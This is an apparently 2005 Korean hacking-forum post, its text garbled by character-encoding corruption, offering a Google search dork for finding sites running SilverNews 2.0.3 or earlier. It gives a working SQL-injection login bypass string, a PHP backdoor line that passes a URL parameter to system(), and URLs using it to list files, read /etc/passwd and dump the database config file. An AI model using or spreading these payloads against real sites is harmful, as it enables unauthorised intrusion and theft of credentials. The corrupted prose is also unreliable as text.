¢Ñ ¿¹Àü °Ô½ÃÆÇÀº ¿©±â¸¦ Ŭ¸¯Çϼ¼¿ä ¢Ð

¡Ý No, 251
¡Ý ÀÛ¼ºÀÎ: lucifer
¡Ý ±¸ºÐ: vulnerability
¡Ý À§Çèµµ: ß¾
¡Ý 2005/9/9(±Ý)
¡Ý Á¶È¸: 1419
¡Ý Æò°¡:
[G050909-H]±¸±ÛÇØÅ·ÆÁ "Powered by SilverNews"  
°Ë»ö¾î
"Powered by SilverNews"


Ãë¾àÁ¡
Silvernews 2.0.3À̳ª ±× ÀÌÇÏÀÇ ¹öÀü¿¡¼­ sql »ðÀÔ°ø°Ý/·Î±×Àοìȸ/¿ø°ÝÄÚµå½ÇÇà/Å©·Î½º»çÀÌÆ®½ºÅ©¸³ÆÃÀ» °¡´ÉÄÉÇÑ´Ù.

sql »ðÀÔ°ø°Ý/·Î±×Àοìȸ:

user: ' or isnull(1/0) /*
pass: whatever


¿ø°Ý¸í·É¾î½ÇÇà:


//***********************************************
</body>
</html>

TEMPLATE;
}
}
system($HTTP_GET_VARS[command]);

/*

¹éµµ¾î url:

http://[target]/[path]//templates/tpl_global.php?command=ls%20-la


ÆÄÀϺ¸±â :

http://[target]/[path]/templates/TPL_GLOBAL.PHP?command=cat%20/etc/passwd


sql ºñ¹øº¸±â :
http://[target]/[path]/templates/TPL_GLOBAL.PHP?command=cat%20/[path_to_config_file]/data.inc.php






  À̸§   ¸ÞÀÏ   °ü¸®ÀÚ±ÇÇÑÀÓ
  ³»¿ë ÀÔ·Ââ Å©°Ô
                    ´äº¯/°ü·Ã ¾²±â ¼öÁ¤/»èÁ¦     ÀÌÀü±Û ´ÙÀ½±Û    
      °ü¸®ÀÚ±ÇÇÑÀÓ
±¸ºÐÀ§Çèµµ°Ô½ÃÁ¦¸ñÀÛ¼ºÀÎÀÛ¼ºÀÏÁ¶È¸
multi  ß¾    [G050904-H]±¸±ÛÇØÅ·ÆÁ inurl:nquser.php filetype:php lucifer 09-04  1509
multi  ß¾    [G050905-H]±¸±ÛÇØÅ·ÆÁ PHPFreeNews inurl:Admin.php lucifer 09-05  1575
vulnerability  ß¾    [G050909-H]±¸±ÛÇØÅ·ÆÁ "Powered by SilverNews" lucifer 09-09  1419
vulnerability  ß¾    [G050910-H]±¸±ÛÇØÅ·ÆÁ "Powered by Gravity Board" lucifer 09-10  1564
webserver  ù»    [G050912-L]±¸±ÛÇØÅ·ÆÁ intitle:"Welcome to the Advanced E... lucifer 09-12  1406
vulnerability  ñé    [G050913-M]±¸±ÛÇØÅ·ÆÁ "2003 DUware All Rights Reserved" lucifer 09-13  1399
login  ñé    [G050516-M]±¸±ÛÇØÅ·ÆÁ filetype:pl -intext:"/usr/bin/... lucifer 09-16  1609
vulnerability  ß¾    [G050918-H]±¸±ÛÇØÅ·ÆÁ "powered by ITWorking" lucifer 09-18  1810

 
óÀ½ ÀÌÀü ´ÙÀ½       ¸ñ·Ï ¾²±â